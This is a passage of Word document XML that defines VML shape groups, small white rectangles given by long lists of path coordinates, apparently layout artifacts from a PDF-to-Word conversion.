,8098,4640,8098,4642,8098,4644,8098,4645,8098,4647,8098,4649,8098,4651,8098,4653,8098,4655,8098,4658,8098,4660,8098,4662,8098,4664,8098,4666,8098,4669,8098,4671,8098,4674,8098,4676,8098,4679,8098,4681,8098,4684,8098,4686,8098,4689,8098,4692,8098,4695,8098,4698,8098,4700,8098,4703,8098,4706,8098,4706,8098,4706,8098,4706,8098,4706,8098,4706,8098,4706,8098,4706,8098,4706,8098,4706,8098,4706,8098,4706,8098,4706,8098,4706,8098,4706,8098,4706,8098,4706,8099,4706,8099,4706,8099,4706,8099,4706,8099,4706,8099,4706,8099,4706,8100,4706,8100,4706,8100,4706,8100,4706,8101,4706,8101,4706,8101,4706,8102,4706,8102,4706,8103,4706,8103,4706,8104,4706,8104,4706,8105,4706,8105,4706,8106,4706,8106,4706,8107,4706,8108,4706,8109,4706,8109,4706,8110,4706,8111,4706,8112,4706,8113,4706,8114,4706,8115,4706,8116,4706,8117,4706,8118,4706,8119,4706,8121,4706,8122,4706,8123,4706,8125,4706,8126,4706,8128,4706,8129,4706,8131,4706,8132,4706,8134,4706,8136,4706,8138,4706,8140,4706,8142,4706,8144,4706,8146,4706,8148,4706,8150,4706,8152,4706,8155,4706,8157,4706,8159,4706,8162,4706,8165,4706,8167,4706,8170,4706,8173,4706,8176,4706,8179,4706,8182,4706,8185,4706,8188,4706,8191,4706,8194,4706,8198,4706,8201,4706,8205,4706,8208,4706,8212,4706,8216,4706,8220,4706,8224,4706,8228,4706,8232,4706,8236,4706,8241,4706,8245,4706,8249,4706,8254,4706,8259,4706,8264,4706,8268,4706,8273,4706,8278,4706,8284,4706,8289,4706,8294,4706,8300,4706,8305,4706,8311,4706,8317,4706,8322,4706,8328,4706,8334,4706,8341,4706,8347,4706,8353,4706,8353,4706,8353,4706,8353,4706,8353,4706,8353,4706,8353,4706,8353,4706,8353,4706,8353,4706,8353,4706,8353,4706,8353,4706,8353,4706,8353,4706,8353,4706,8353,4706,8353,4706,8353,4706,8353,4706,8353,4706,8353,4706,8353,4706,8353,4706,8353,4705,8353,4705,8353,4705,8353,4705,8353,4705,8353,4705,8353,4704,8353,4704,8353,4704,8353,4704,8353,4704,8353,4703,8353,4703,8353,4703,8353,4702,8353,4702,8353,4702,8353,4701,8353,4701,8353,4701,8353,4700,8353,4700,8353,4699,8353,4699,8353,4698,8353,4698,8353,4697,8353,4697,8353,4696,8353,4696,8353,4695,8353,4695,8353,4694,8353,4693,8353,4692,8353,4692,8353,4691,8353,4690,8353,4689,8353,4689,8353,4688,8353,4687,8353,4686,8353,4685,8353,4684,8353,4683,8353,4682,8353,4681,8353,4680,8353,4679,8353,4677,8353,4676,8353,4675,8353,4674,8353,4673,8353,4671,8353,4670,8353,4669,8353,4667,8353,4666,8353,4664,8353,4663,8353,4661,8353,4659,8353,4658,8353,4656,8353,4654,8353,4653,8353,4651,8353,4649,8353,4647,8353,4645,8353,4643,8353,4641,8353,4639,8353,4637,8353,4635,8353,4633,8353,4631,8353,4629,8353,4626,8353,4624,8353,4622,8353,4619,8353,4617,8353,4614,8353,4612,8353,4609,8353,4606,8353,4604,8353,4601,8353,4598,8353,4595,8353,4592,8353,4589,8353,4586,8353,4586,8353,4586,8353,4586,8353,4586,8353,4586,8353,4586,8353,4586,8353,4586,8353,4586,8353,4586,8353,4586,8353,4586,8353,4586,8353,4586,8353,4586,8353,4586,8353,4586,8353,4586,8352,4586,8352,4586,8352,4586,8352,4586,8352,4586,8352,4586,8351,4586,8351,4586,8351,4586,8351,4586,8350,4586,8350,4586,8350,4586,8349,4586,8349,4586,8348,4586,8348,4586,8347,4586,8347,4586,8346,4586,8346,4586,8345,4586,8344,4586,8344,4586,8343,4586,8342,4586,8341,4586,8340,4586,8339,4586,8338,4586,8337,4586,8336,4586,8335,4586,8334,4586,8333,4586,8332,4586,8331,4586,8329,4586,8328,4586,8327,4586,8325,4586,8324,4586,8322,4586,8321,4586,8319,4586,8317,4586,8315,4586,8314,4586,8312,4586,8310,4586,8308,4586,8306,4586,8303,4586,8301,4586,8299,4586,8297,4586,8294,4586,8292,4586,8289,4586,8287,4586,8284,4586,8281,4586,8279,4586,8276,4586,8273,4586,8270,4586,8267,4586,8263,4586,8260,4586,8257,4586,8254,4586,8250,4586,8246,4586,8243,4586,8239,4586,8235,4586,8231,4586,8227,4586,8223,4586,8219,4586,8215,4586,8211,4586,8206,4586,8202,4586,8197,4586,8193,4586,8188,4586,8183,4586,8178,4586,8173,4586,8168,4586,8162,4586,8157,4586,8152,4586,8146,4586,8141,4586,8135,4586,8129,4586,8123,4586,8117,4586,8111,4586,8104,4586,8098e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:246.500pt;margin-top:440.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4930,8810" coordsize="130,270">
        <v:shape style="position:absolute;left:4930;top:8810;width:130;height:270" coordorigin="4930,8810" coordsize="130,270" path="m4946,8833l4946,8833,4946,8833,4946,8833,4946,8833,4946,8833,4947,8833,4947,8833,4947,8833,4947,8833,4947,8833,4947,8833,4947,8833,4947,8833,4947,8833,4947,8833,4947,8833,4947,8833,4947,8833,4947,8833,4947,8833,4947,8833,4947,8833,4947,8833,4947,8833,4947,8833,4948,8833,4948,8833,4948,8833,4948,8833,4948,8833,4948,8833,4949,8833,4949,8833,4949,8833,4949,8833,4950,8833,4950,8833,4950,8833,4950,8833,4951,8833,4951,8833,4951,8833,4952,8833,4952,8833,4953,8833,4953,8833,4953,8833,4954,8833,4954,8833,4955,8833,4955,8833,4956,8833,4957,8833,4957,8833,4958,8833,4958,8833,4959,8833,4960,8833,4960,8833,4961,8833,4962,8833,4963,8833,4963,8833,4964,8833,4965,8833,4966,8833,4967,8833,4968,8833,4969,8833,4970,8833,4971,8833,4972,8833,4973,8833,4974,8833,4975,8833,4977,8833,4978,8833,4979,8833,4980,8833,4982,8833,4983,8833,4984,8833,4986,8833,4987,8833,4989,8833,4990,8833,4992,8833,4993,8833,4995,8833,4997,8833,4998,8833,5000,8833,5002,8833,5004,8833,5006,8833,5008,8833,5010,8833,5012,8833,5014,8833,5016,8833,5018,8833,5020,8833,5022,8833,5024,8833,5027,8833,5029,8833,5031,8833,5034,8833,5036,8833,5039,8833,5041,8833,5044,8833,5047,8833,5049,8833,5052,8833,5055,8833,5058,8833,5061,8833,5064,8833,5067,8833,5067,8833,5067,8833,5067,8833,5067,8833,5067,8833,5067,8833,5067,8833,5067,8834,5067,8834,5067,8834,5067,8834,5067,8834,5067,8834,5067,8834,5067,8834,5067,8834,5067,8834,5067,8834,5067,8834,5067,8834,5067,8835,5067,8835,5067,8835,5067,8835,5067,8836,5067,8836,5067,8836,5067,8836,5067,8837,5067,8837,5067,8838,5067,8838,5067,8838,5067,8839,5067,8839,5067,8840,5067,8841,5067,8841,5067,8842,5067,8842,5067,8843,5067,8844,5067,8845,5067,8845,5067,8846,5067,8847,5067,8848,5067,8849,5067,8850,5067,8851,5067,8852,5067,8854,5067,8855,5067,8856,5067,8857,5067,8859,5067,8860,5067,8861,5067,8863,5067,8865,5067,8866,5067,8868,5067,8870,5067,8871,5067,8873,5067,8875,5067,8877,5067,8879,5067,8881,5067,8883,5067,8885,5067,8888,5067,8890,5067,8892,5067,8895,5067,8897,5067,8900,5067,8903,5067,8905,5067,8908,5067,8911,5067,8914,5067,8917,5067,8920,5067,8923,5067,8926,5067,8930,5067,8933,5067,8937,5067,8940,5067,8944,5067,8948,5067,8951,5067,8955,5067,8959,5067,8963,5067,8967,5067,8972,5067,8976,5067,8980,5067,8985,5067,8989,5067,8994,5067,8999,5067,9004,5067,9009,5067,9014,5067,9019,5067,9024,5067,9030,5067,9035,5067,9041,5067,9046,5067,9052,5067,9058,5067,9064,5067,9070,5067,9076,5067,9082,5067,9089,5067,9089,5067,9089,5067,9089,5067,9089,5067,9089,5067,9089,5067,9089,5067,9089,5067,9089,5067,9089,5066,9089,5066,9089,5066,9089,5066,9089,5066,9089,5066,9089,5066,9089,5066,9089,5066,9089,5066,9089,5066,9089,5066,9089,5066,9089,5066,9089,5066,9089,5065,9089,5065,9089,5065,9089,5065,9089,5065,9089,5065,9089,5064,9089,5064,9089,5064,9089,5064,9089,5063,9089,5063,9089,5063,9089,5063,9089,5062,9089,5062,9089,5062,9089,5061,9089,5061,9089,5060,9089,5060,9089,5060,9089,5059,9089,5059,9089,5058,9089,5058,9089,5057,9089,5057,9089,5056,9089,5055,9089,5055,9089,5054,9089,5053,9089,5053,9089,5052,9089,5051,9089,5050,9089,5050,9089,5049,9089,5048,9089,5047,9089,5046,9089,5045,9089,5044,9089,5043,9089,5042,9089,5041,9089,5040,9089,5039,9089,5038,9089,5036,9089,5035,9089,5034,9089,5033,9089,5031,9089,5030,9089,5029,9089,5027,9089,5026,9089,5024,9089,5023,9089,5021,9089,5020,9089,5018,9089,5016,9089,5015,9089,5013,9089,5011,9089,5009,9089,5007,9089,5005,9089,5004,9089,5002,9089,4999,9089,4997,9089,4995,9089,4993,9089,4991,9089,4989,9089,4986,9089,4984,9089,4982,9089,4979,9089,4977,9089,4974,9089,4972,9089,4969,9089,4966,9089,4964,9089,4961,9089,4958,9089,4955,9089,4952,9089,4949,9089,4946,9089,4946,9089,4946,9089,4946,9089,4946,9089,4946,9089,4946,9089,4946,9089,4946,9089,4946,9088,4946,9088,4946,9088,4946,9088,4946,9088,4946,9088,4946,9088,4946,9088,4946,9088,4946,9088,4946,9088,4946,9088,4946,9087,4946,9087,4946,9087,4946,9087,4946,9086,4946,9086,4946,9086,4946,9086,4946,9085,4946,9085,4946,9084,4946,9084,4946,9084,4946,9083,4946,9083,4946,9082,4946,9082,4946,9081,4946,9080,4946,9080,4946,9079,4946,9078,4946,9077,4946,9077,4946,9076,4946,9075,4946,9074,4946,9073,4946,9072,4946,9071,4946,9070,4946,9068,4946,9067,4946,9066,4946,9065,4946,9063,4946,9062,4946,9061,4946,9059,4946,9057,4946,9056,4946,9054,4946,9052,4946,9051,4946,9049,4946,9047,4946,9045,4946,9043,4946,9041,4946,9039,4946,9037,4946,9034,4946,9032,4946,9030,4946,9027,4946,9025,4946,9022,4946,9019,4946,9017,4946,9014,4946,9011,4946,9008,4946,9005,4946,9002,4946,8999,4946,8996,4946,8992,4946,8989,4946,8985,4946,8982,4946,8978,4946,8974,4946,8971,4946,8967,4946,8963,4946,8959,4946,8955,4946,8950,4946,8946,4946,8942,4946,8937,4946,8933,4946,8928,4946,8923,4946,8918,4946,8913,4946,8908,4946,8903,4946,8898,4946,8893,4946,8887,4946,8882,4946,8876,4946,8870,4946,8864,4946,8858,4946,8852,4946,8846,4946,8840,4946,8833e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:186.500pt;margin-top:477.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3730,9550" coordsize="130,270">
        <v:shape style="position:absolute;left:3730;top:9550;width:130;height:270" coordorigin="3730,9550" coordsize="130,270" path="m3746,9569l3746,9569,3746,9569,3746,9569,3746,9569,3746,9569,3746,9569,3746,9569,3746,9569,3746,9569,3746,9569,3746,9569,3746,9569,3746,9569,3746,9569,3746,9569,3746,9569,3746,9569,3746,9569,3746,9569,3746,9569,3746,9569,3747,9569,3747,9569,3747,9569,3747,9569,3747,9569,3747,9569,3747,9569,3747,9569,3748,9569,3748,9569,3748,9569,3748,9569,3748,9569,3749,9569,3749,9569,3749,9569,3749,9569,3750,9569,3750,9569,3750,9569,3751,9569,3751,9569,3752,9569,3752,9569,3752,9569,3753,9569,3753,9569,3754,9569,3754,9569,3755,9569,3755,9569,3756,9569,3756,9569,3757,9569,3758,9569,3758,9569,3759,9569,3760,9569,3761,9569,3761,9569,3762,9569,3763,9569,3764,9569,3765,9569,3765,9569,3766,9569,3767,9569,3768,9569,3769,9569,3770,9569,3771,9569,3772,9569,3774,9569,3775,9569,3776,9569,3777,9569,3778,9569,3780,9569,3781,9569,3782,9569,3784,9569,3785,9569,3787,9569,3788,9569,3790,9569,3791,9569,3793,9569,3794,9569,3796,9569,3798,9569,3800,9569,3801,9569,3803,9569,3805,9569,3807,9569,3809,9569,3811,9569,3813,9569,3815,9569,3817,9569,3819,9569,3821,9569,3824,9569,3826,9569,3828,9569,3831,9569,3833,9569,3836,9569,3838,9569,3841,9569,3843,9569,3846,9569,3849,9569,3851,9569,3854,9569,3857,9569,3860,9569,3863,9569,3866,9569,3866,9569,3866,9569,3866,9569,3866,9569,3866,9569,3866,9569,3866,9569,3866,9569,3866,9569,3866,9569,3866,9569,3866,9569,3866,9569,3866,9569,3866,9569,3866,9569,3866,9569,3866,9570,3866,9570,3866,9570,3866,9570,3866,9570,3866,9570,3866,9571,3866,9571,3866,9571,3866,9571,3866,9572,3866,9572,3866,9573,3866,9573,3866,9573,3866,9574,3866,9574,3866,9575,3866,9575,3866,9576,3866,9576,3866,9577,3866,9578,3866,9579,3866,9579,3866,9580,3866,9581,3866,9582,3866,9583,3866,9584,3866,9585,3866,9586,3866,9587,3866,9588,3866,9589,3866,9590,3866,9591,3866,9593,3866,9594,3866,9595,3866,9597,3866,9598,3866,9600,3866,9602,3866,9603,3866,9605,3866,9607,3866,9609,3866,9610,3866,9612,3866,9614,3866,9616,3866,9619,3866,9621,3866,9623,3866,9625,3866,9628,3866,9630,3866,9633,3866,9635,3866,9638,3866,9641,3866,9643,3866,9646,3866,9649,3866,9652,3866,9655,3866,9659,3866,9662,3866,9665,3866,9669,3866,9672,3866,9676,3866,9679,3866,9683,3866,9687,3866,9691,3866,9695,3866,9699,3866,9703,3866,9707,3866,9711,3866,9716,3866,9720,3866,9725,3866,9729,3866,9734,3866,9739,3866,9744,3866,9749,3866,9754,3866,9760,3866,9765,3866,9770,3866,9776,3866,9782,3866,9787,3866,9793,3866,9799,3866,9805,3866,9811,3866,9818,3866,9824,3866,9824,3866,9824,3866,9824,3866,9824,3866,9824,3866,9824,3866,9824,3866,9824,3866,9824,3866,9824,3866,9824,3866,9824,3866,9824,3866,9824,3866,9824,3866,9824,3866,9824,3866,9824,3866,9824,3865,9824,3865,9824,3865,9824,3865,9824,3865,9824,3865,9824,3865,9824,3865,9824,3865,9824,3864,9824,3864,9824,3864,9824,3864,9824,3864,9824,3863,9824,3863,9824,3863,9824,3863,9824,3862,9824,3862,9824,3862,9824,3861,9824,3861,9824,3861,9824,3860,9824,3860,9824,3859,9824,3859,9824,3859,9824,3858,9824,3858,9824,3857,9824,3856,9824,3856,9824,3855,9824,3855,9824,3854,9824,3853,9824,3853,9824,3852,9824,3851,9824,3851,9824,3850,9824,3849,9824,3848,9824,3847,9824,3846,9824,3845,9824,3845,9824,3844,9824,3843,9824,3842,9824,3840,9824,3839,9824,3838,9824,3837,9824,3836,9824,3835,9824,3833,9824,3832,9824,3831,9824,3829,9824,3828,9824,3827,9824,3825,9824,3824,9824,3822,9824,3821,9824,3819,9824,3817,9824,3816,9824,3814,9824,3812,9824,3810,9824,3809,9824,3807,9824,3805,9824,3803,9824,3801,9824,3799,9824,3797,9824,3795,9824,3793,9824,3790,9824,3788,9824,3786,9824,3783,9824,3781,9824,3779,9824,3776,9824,3774,9824,3771,9824,3769,9824,3766,9824,3763,9824,3760,9824,3758,9824,3755,9824,3752,9824,3749,9824,3746,9824,3746,9824,3746,9824,3746,9824,3746,9824,3746,9824,3746,9824,3746,9824,3746,9824,3746,9824,3746,9824,3746,9824,3746,9824,3746,9824,3746,9824,3746,9824,3746,9823,3746,9823,3746,9823,3746,9823,3746,9823,3746,9823,3746,9823,3746,9822,3746,9822,3746,9822,3746,9822,3746,9821,3746,9821,3746,9821,3746,9820,3746,9820,3746,9819,3746,9819,3746,9819,3746,9818,3746,9817,3746,9817,3746,9816,3746,9816,3746,9815,3746,9814,3746,9814,3746,9813,3746,9812,3746,9811,3746,9810,3746,9809,3746,9808,3746,9807,3746,9806,3746,9805,3746,9804,3746,9803,3746,9801,3746,9800,3746,9799,3746,9797,3746,9796,3746,9794,3746,9793,3746,9791,3746,9790,3746,9788,3746,9786,3746,9784,3746,9782,3746,9780,3746,9778,3746,9776,3746,9774,3746,9772,3746,9770,3746,9767,3746,9765,3746,9763,3746,9760,3746,9757,3746,9755,3746,9752,3746,9749,3746,9746,3746,9743,3746,9740,3746,9737,3746,9734,3746,9731,3746,9728,3746,9724,3746,9721,3746,9717,3746,9714,3746,9710,3746,9706,3746,9702,3746,9698,3746,9694,3746,9690,3746,9686,3746,9681,3746,9677,3746,9673,3746,9668,3746,9663,3746,9659,3746,9654,3746,9649,3746,9644,3746,9638,3746,9633,3746,9628,3746,9622,3746,9617,3746,9611,3746,9605,3746,9600,3746,9594,3746,9588,3746,9581,3746,9575,3746,9569e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:246.500pt;margin-top:511.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4930,10230" coordsize="130,270">
        <v:shape style="position:absolute;left:4930;top:10230;width:130;height:270" coordorigin="4930,10230" coordsize="130,270" path="m4946,10259l4946,10259,4946,10259,4946,10259,4946,10259,4946,10259,4947,10259,4947,10259,4947,10259,4947,10259,4947,10259,4947,10259,4947,10259,4947,10259,4947,10259,4947,10259,4947,10259,4947,10259,4947,10259,4947,10259,4947,10259,4947,10259,4947,10259,4947,10259,4947,10259,4947,10259,4948,10259,4948,10259,4948,10259,4948,10259,4948,10259,4948,10259,4949,10259,4949,10259,4949,10259,4949,10259,4950,10259,4950,10259,4950,10259,4950,10259,4951,10259,4951,10259,4951,10259,4952,10259,4952,10259,4953,10259,4953,10259,4953,10259,4954,10259,4954,10259,4955,10259,4955,10259,4956,10259,4957,10259,4957,10259,4958,10259,4958,10259,4959,10259,4960,10259,4960,10259,4961,10259,4962,10259,4963,10259,4963,10259,4964,10259,4965,10259,4966,10259,4967,10259,4968,10259,4969,10259,4970,10259,4971,10259,4972,10259,4973,10259,4974,10259,4975,10259,4977,10259,4978,10259,4979,10259,4980,10259,4982,10259,4983,10259,4984,10259,4986,10259,4987,10259,4989,10259,4990,10259,4992,10259,4993,10259,4995,10259,4997,10259,4998,10259,5000,10259,5002,10259,5004,10259,5006,10259,5008,10259,5010,10259,5012,10259,5014,10259,5016,10259,5018,10259,5020,10259,5022,10259,5024,10259,5027,10259,5029,10259,5031,10259,5034,10259,5036,10259,5039,10259,5041,10259,5044,10259,5047,10259,5049,10259,5052,10259,5055,10259,5058,10259,5061,10259,5064,10259,5067,10259,5067,10259,5067,10259,5067,10259,5067,10259,5067,10259,5067,10259,5067,10259,5067,10259,5067,10259,5067,10259,5067,10259,5067,10259,5067,10259,5067,10260,5067,10260,5067,10260,5067,10260,5067,10260,5067,10260,5067,10260,5067,10260,5067,10261,5067,10261,5067,10261,5067,10261,5067,10262,5067,10262,5067,10262,5067,10262,5067,10263,5067,10263,5067,10264,5067,10264,5067,10265,5067,10265,5067,10266,5067,10266,5067,10267,5067,10267,5067,10268,5067,10269,5067,10270,5067,10270,5067,10271,5067,10272,5067,10273,5067,10274,5067,10275,5067,10276,5067,10277,5067,10278,5067,10279,5067,10280,5067,10282,5067,10283,5067,10284,5067,10286,5067,10287,5067,10289,5067,10290,5067,10292,5067,10294,5067,10295,5067,10297,5067,10299,5067,10301,5067,10303,5067,10305,5067,10307,5067,10309,5067,10311,5067,10313,5067,10316,5067,10318,5067,10321,5067,10323,5067,10326,5067,10328,5067,10331,5067,10334,5067,10337,5067,10340,5067,10343,5067,10346,5067,10349,5067,10352,5067,10355,5067,10359,5067,10362,5067,10366,5067,10370,5067,10373,5067,10377,5067,10381,5067,10385,5067,10389,5067,10393,5067,10397,5067,10402,5067,10406,5067,10411,5067,10415,5067,10420,5067,10425,5067,10429,5067,10434,5067,10439,5067,10445,5067,10450,5067,10455,5067,10461,5067,10466,5067,10472,5067,10478,5067,10483,5067,10489,5067,10495,5067,10502,5067,10508,5067,10514,5067,10514,5067,10514,5067,10514,5067,10514,5067,10514,5067,10514,5067,10514,5067,10514,5067,10514,5067,10514,5066,10514,5066,10514,5066,10514,5066,10514,5066,10514,5066,10514,5066,10514,5066,10514,5066,10514,5066,10514,5066,10514,5066,10514,5066,10514,5066,10514,5066,10514,5065,10514,5065,10514,5065,10514,5065,10514,5065,10514,5065,10514,5064,10514,5064,10514,5064,10514,5064,10514,5063,10514,5063,10514,5063,10514,5063,10514,5062,10514,5062,10514,5062,10514,5061,10514,5061,10514,5060,10514,5060,10514,5060,10514,5059,10514,5059,10514,5058,10514,5058,10514,5057,10514,5057,10514,5056,10514,5055,10514,5055,10514,5054,10514,5053,10514,5053,10514,5052,10514,5051,10514,5050,10514,5050,10514,5049,10514,5048,10514,5047,10514,5046,10514,5045,10514,5044,10514,5043,10514,5042,10514,5041,10514,5040,10514,5039,10514,5038,10514,5036,10514,5035,10514,5034,10514,5033,10514,5031,10514,5030,10514,5029,10514,5027,10514,5026,10514,5024,10514,5023,10514,5021,10514,5020,10514,5018,10514,5016,10514,5015,10514,5013,10514,5011,10514,5009,10514,5007,10514,5005,10514,5004,10514,5002,10514,4999,10514,4997,10514,4995,10514,4993,10514,4991,10514,4989,10514,4986,10514,4984,10514,4982,10514,4979,10514,4977,10514,4974,10514,4972,10514,4969,10514,4966,10514,4964,10514,4961,10514,4958,10514,4955,10514,4952,10514,4949,10514,4946,10514,4946,10514,4946,10514,4946,10514,4946,10514,4946,10514,4946,10514,4946,10514,4946,10514,4946,10514,4946,10514,4946,10514,4946,10514,4946,10514,4946,10514,4946,10514,4946,10514,4946,10514,4946,10514,4946,10513,4946,10513,4946,10513,4946,10513,4946,10513,4946,10512,4946,10512,4946,10512,4946,10512,4946,10511,4946,10511,4946,10511,4946,10510,4946,10510,4946,10509,4946,10509,4946,10508,4946,10508,4946,10507,4946,10507,4946,10506,4946,10505,4946,10505,4946,10504,4946,10503,4946,10502,4946,10501,4946,10500,4946,10500,4946,10499,4946,10498,4946,10496,4946,10495,4946,10494,4946,10493,4946,10492,4946,10490,4946,10489,4946,10488,4946,10486,4946,10485,4946,10483,4946,10482,4946,10480,4946,10478,4946,10476,4946,10475,4946,10473,4946,10471,4946,10469,4946,10467,4946,10465,4946,10462,4946,10460,4946,10458,4946,10455,4946,10453,4946,10450,4946,10448,4946,10445,4946,10442,4946,10440,4946,10437,4946,10434,4946,10431,4946,10428,4946,10425,4946,10421,4946,10418,4946,10415,4946,10411,4946,10408,4946,10404,4946,10400,4946,10396,4946,10393,4946,10389,4946,10384,4946,10380,4946,10376,4946,10372,4946,10367,4946,10363,4946,10358,4946,10354,4946,10349,4946,10344,4946,10339,4946,10334,4946,10329,4946,10324,4946,10318,4946,10313,4946,10307,4946,10302,4946,10296,4946,10290,4946,10284,4946,10278,4946,10272,4946,10266,4946,10259e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:168.500pt;margin-top:547.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3370,10950" coordsize="130,270">
        <v:shape style="position:absolute;left:3370;top:10950;width:130;height:270" coordorigin="3370,10950" coordsize="130,270" path="m3386,10965l3386,10965,3386,10965,3386,10965,3386,10965,3386,10965,3386,10965,3386,10965,3386,10965,3386,10965,3386,10965,3386,10965,3386,10965,3386,10965,3386,10965,3386,10965,3386,10965,3386,10965,3386,10965,3386,10965,3386,10965,3386,10965,3386,10965,3386,10965,3387,10965,3387,10965,3387,10965,3387,10965,3387,10965,3387,10965,3387,10965,3388,10965,3388,10965,3388,10965,3388,10965,3389,10965,3389,10965,3389,10965,3389,10965,3390,10965,3390,10965,3390,10965,3391,10965,3391,10965,3391,10965,3392,10965,3392,10965,3393,10965,3393,10965,3394,10965,3394,10965,3395,10965,3395,10965,3396,10965,3396,10965,3397,10965,3398,10965,3398,10965,3399,10965,3400,10965,3400,10965,3401,10965,3402,10965,3403,10965,3404,10965,3404,10965,3405,10965,3406,10965,3407,10965,3408,10965,3409,10965,3410,10965,3411,10965,3412,10965,3413,10965,3415,10965,3416,10965,3417,10965,3418,10965,3420,10965,3421,10965,3422,10965,3424,10965,3425,10965,3426,10965,3428,10965,3429,10965,3431,10965,3433,10965,3434,10965,3436,10965,3438,10965,3439,10965,3441,10965,3443,10965,3445,10965,3447,10965,3449,10965,3451,10965,3453,10965,3455,10965,3457,10965,3459,10965,3461,10965,3464,10965,3466,10965,3468,10965,3471,10965,3473,10965,3475,10965,3478,10965,3481,10965,3483,10965,3486,10965,3489,10965,3491,10965,3494,10965,3497,10965,3500,10965,3503,10965,3506,10965,3506,10965,3506,10965,3506,10965,3506,10965,3506,10965,3506,10965,3506,10965,3506,10965,3506,10965,3506,10965,3506,10965,3506,10965,3506,10965,3506,10965,3506,10965,3506,10965,3506,10965,3506,10965,3506,10965,3506,10966,3506,10966,3506,10966,3506,10966,3506,10966,3506,10967,3506,10967,3506,10967,3506,10968,3506,10968,3506,10968,3506,10969,3506,10969,3506,10969,3506,10970,3506,10970,3506,10971,3506,10972,3506,10972,3506,10973,3506,10974,3506,10974,3506,10975,3506,10976,3506,10977,3506,10977,3506,10978,3506,10979,3506,10980,3506,10981,3506,10982,3506,10983,3506,10985,3506,10986,3506,10987,3506,10988,3506,10990,3506,10991,3506,10993,3506,10994,3506,10996,3506,10997,3506,10999,3506,11001,3506,11002,3506,11004,3506,11006,3506,11008,3506,11010,3506,11012,3506,11014,3506,11016,3506,11019,3506,11021,3506,11023,3506,11026,3506,11028,3506,11031,3506,11034,3506,11036,3506,11039,3506,11042,3506,11045,3506,11048,3506,11051,3506,11054,3506,11057,3506,11061,3506,11064,3506,11068,3506,11071,3506,11075,3506,11079,3506,11082,3506,11086,3506,11090,3506,11094,3506,11098,3506,11103,3506,11107,3506,11111,3506,11116,3506,11121,3506,11125,3506,11130,3506,11135,3506,11140,3506,11145,3506,11150,3506,11155,3506,11161,3506,11166,3506,11172,3506,11177,3506,11183,3506,11189,3506,11195,3506,11201,3506,11207,3506,11213,3506,11220,3506,11220,3506,11220,3506,11220,3506,11220,3506,11220,3506,11220,3506,11220,3506,11220,3506,11220,3506,11220,3506,11220,3506,11220,3506,11220,3506,11220,3506,11220,3506,11220,3505,11220,3505,11220,3505,11220,3505,11220,3505,11220,3505,11220,3505,11220,3505,11220,3505,11220,3505,11220,3505,11220,3504,11220,3504,11220,3504,11220,3504,11220,3504,11220,3503,11220,3503,11220,3503,11220,3503,11220,3502,11220,3502,11220,3502,11220,3502,11220,3501,11220,3501,11220,3500,11220,3500,11220,3500,11220,3499,11220,3499,11220,3498,11220,3498,11220,3497,11220,3497,11220,3496,11220,3496,11220,3495,11220,3495,11220,3494,11220,3493,11220,3493,11220,3492,11220,3491,11220,3490,11220,3490,11220,3489,11220,3488,11220,3487,11220,3486,11220,3485,11220,3484,11220,3483,11220,3482,11220,3481,11220,3480,11220,3479,11220,3478,11220,3477,11220,3476,11220,3474,11220,3473,11220,3472,11220,3471,11220,3469,11220,3468,11220,3466,11220,3465,11220,3464,11220,3462,11220,3460,11220,3459,11220,3457,11220,3456,11220,3454,11220,3452,11220,3450,11220,3448,11220,3447,11220,3445,11220,3443,11220,3441,11220,3439,11220,3437,11220,3435,11220,3432,11220,3430,11220,3428,11220,3426,11220,3423,11220,3421,11220,3418,11220,3416,11220,3413,11220,3411,11220,3408,11220,3406,11220,3403,11220,3400,11220,3397,11220,3395,11220,3392,11220,3389,11220,3386,11220,3386,11220,3386,11220,3386,11220,3386,11220,3386,11220,3386,11220,3386,11220,3386,11220,3386,11220,3386,11220,3386,11220,3386,11219,3386,11219,3386,11219,3386,11219,3386,11219,3386,11219,3386,11219,3386,11219,3386,11219,3386,11218,3386,11218,3386,11218,3386,11218,3386,11218,3386,11217,3386,11217,3386,11217,3386,11216,3386,11216,3386,11216,3386,11215,3386,11215,3386,11214,3386,11214,3386,11213,3386,11213,3386,11212,3386,11211,3386,11211,3386,11210,3386,11209,3386,11208,3386,11208,3386,11207,3386,11206,3386,11205,3386,11204,3386,11203,3386,11202,3386,11201,3386,11200,3386,11198,3386,11197,3386,11196,3386,11194,3386,11193,3386,11192,3386,11190,3386,11189,3386,11187,3386,11185,3386,11184,3386,11182,3386,11180,3386,11178,3386,11176,3386,11174,3386,11172,3386,11170,3386,11168,3386,11165,3386,11163,3386,11161,3386,11158,3386,11156,3386,11153,3386,11151,3386,11148,3386,11145,3386,11142,3386,11139,3386,11136,3386,11133,3386,11130,3386,11127,3386,11123,3386,11120,3386,11116,3386,11113,3386,11109,3386,11106,3386,11102,3386,11098,3386,11094,3386,11090,3386,11086,3386,11081,3386,11077,3386,11073,3386,11068,3386,11064,3386,11059,3386,11054,3386,11049,3386,11044,3386,11039,3386,11034,3386,11029,3386,11024,3386,11018,3386,11013,3386,11007,3386,11001,3386,10995,3386,10989,3386,10983,3386,10977,3386,10971,3386,10965e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:234.500pt;margin-top:565.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4690,11310" coordsize="130,270">
